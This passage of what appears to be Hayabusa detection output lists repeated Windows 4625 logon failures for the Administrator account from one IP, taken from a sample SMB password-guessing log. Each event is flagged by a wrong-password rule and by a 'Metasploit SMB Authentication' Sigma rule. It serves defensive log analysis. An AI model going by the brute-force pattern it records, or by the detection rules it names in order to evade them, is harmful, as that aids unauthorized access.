Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
